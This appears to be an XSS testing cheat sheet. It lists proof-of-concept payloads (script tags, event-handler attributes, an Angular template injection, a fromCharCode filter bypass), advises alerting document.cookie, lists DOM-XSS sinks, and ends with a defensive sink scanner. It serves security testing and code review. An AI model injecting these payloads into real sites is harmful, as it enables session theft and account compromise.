Common

  1. <script>alert(document.domain)</script>
  2. javascript:alert(document.cookie)

Tag Attribute

  1. <a href="javascript:alert(document.domain)">
  2. <img src="p" onerror="alert(document.domain)">
  3. <iframe src="https://example.com/#" onload="this.src+='<img src=x onerror=print()>'"></iframe>
  4. "><svg onload=alert(document.domain)>
  5. "></select><img src=1 onerror=alert(document.domain)>

Angular

  1. {{$on.constructor('alert(1)')()}}

Others

  1. Using eval() combined with String.fromCharCode()
    • case: a <script> tag can be injected, but the word alert is filtered.
    • example: <script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 100, 111, 109, 97, 105, 110, 41))</script>; the character codes decode to alert(document.domain), so this is equivalent to eval("alert(document.domain)").

Note

Avoid alert(1) as the proof-of-concept payload; these values give more useful evidence of what the injected script can reach:

  1. document.domain
  2. document.location
  3. document.cookie

For example: <img src="p" onerror="alert(document.domain)">

JavaScript Sinks That Lead to DOM-XSS Vulnerabilities

// ========== JavaScript ==========
document.write()
document.writeln()
document.domain
element.innerHTML
element.outerHTML
element.insertAdjacentHTML
element.onevent
 
// ========== jQuery ==========
add()
after()
append()
animate()
insertAfter()
insertBefore()
before()
html()
prepend()
replaceAll()
replaceWith()
wrap()
wrapInner()
wrapAll()
has()
constructor()
init()
index()
jQuery.parseHTML()
$.parseHTML()
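The sink list above is what a code reviewer greps for. As an added example (not part of the original cheat sheet), the scanner below flags those sinks in JavaScript source and notes whether a classic untrusted source (location, document.URL, document.referrer, document.cookie, window.name) appears on the same line. The regular expressions and the sample source are constructed assumptions about how the sinks usually appear in code.

```javascript
// Added example: static scan for the DOM-XSS sinks listed in the cheat sheet.
// Patterns are heuristics (assumptions), not an exhaustive taint analysis.
const SINK_PATTERNS = [
  { sink: 'document.write',      re: /\bdocument\.writeln?\s*\(/ },
  { sink: 'document.domain',     re: /\bdocument\.domain\s*=[^=]/ },        // assignment only
  { sink: 'innerHTML/outerHTML', re: /\.(innerHTML|outerHTML)\s*=[^=]/ },   // assignment, not ===
  { sink: 'insertAdjacentHTML',  re: /\.insertAdjacentHTML\s*\(/ },
  { sink: 'on-event handler',    re: /\.on[a-z]+\s*=[^=]/ },
  { sink: 'eval',                re: /\beval\s*\(/ },
  { sink: 'jQuery DOM writer',   re: /\.(html|append|prepend|after|before|replaceWith|replaceAll|wrap|wrapInner|wrapAll|insertAfter|insertBefore)\s*\(/ },
  { sink: 'jQuery.parseHTML',    re: /(?:\bjQuery|\$)\.parseHTML\s*\(/ },
];

// Untrusted sources an attacker controls through the URL or other pages.
const SOURCE_RE = /\b(location|document\.(URL|referrer|cookie)|window\.name)\b/;

// Returns one finding per (line, sink) pair; line numbers are 1-indexed.
function scanForSinks(source) {
  const findings = [];
  source.split('\n').forEach((text, index) => {
    for (const { sink, re } of SINK_PATTERNS) {
      if (re.test(text)) {
        findings.push({
          line: index + 1,
          sink,
          // A source on the same line is the strongest signal; data arriving
          // through a variable (as on the innerHTML line) still needs manual review.
          sourceOnLine: SOURCE_RE.test(text),
          code: text.trim(),
        });
      }
    }
  });
  return findings;
}

// Constructed sample source: three sink uses and one safe textContent write.
const SAMPLE_SOURCE = [
  "const name = new URLSearchParams(location.search).get('name');",
  "document.getElementById('greeting').innerHTML = 'Hi ' + name;",
  "document.getElementById('greeting').textContent = 'Hi ' + name;",
  "$('#out').html(location.hash.slice(1));",
  "el.insertAdjacentHTML('beforeend', trustedTemplate);",
].join('\n');

for (const f of scanForSinks(SAMPLE_SOURCE)) {
  const hint = f.sourceOnLine ? ' (untrusted source on same line)' : '';
  console.log(`line ${f.line}: ${f.sink}${hint} -> ${f.code}`);
}
```

The textContent line on purpose produces no finding: writing untrusted data as text rather than markup is the usual fix for the innerHTML and jQuery .html() cases.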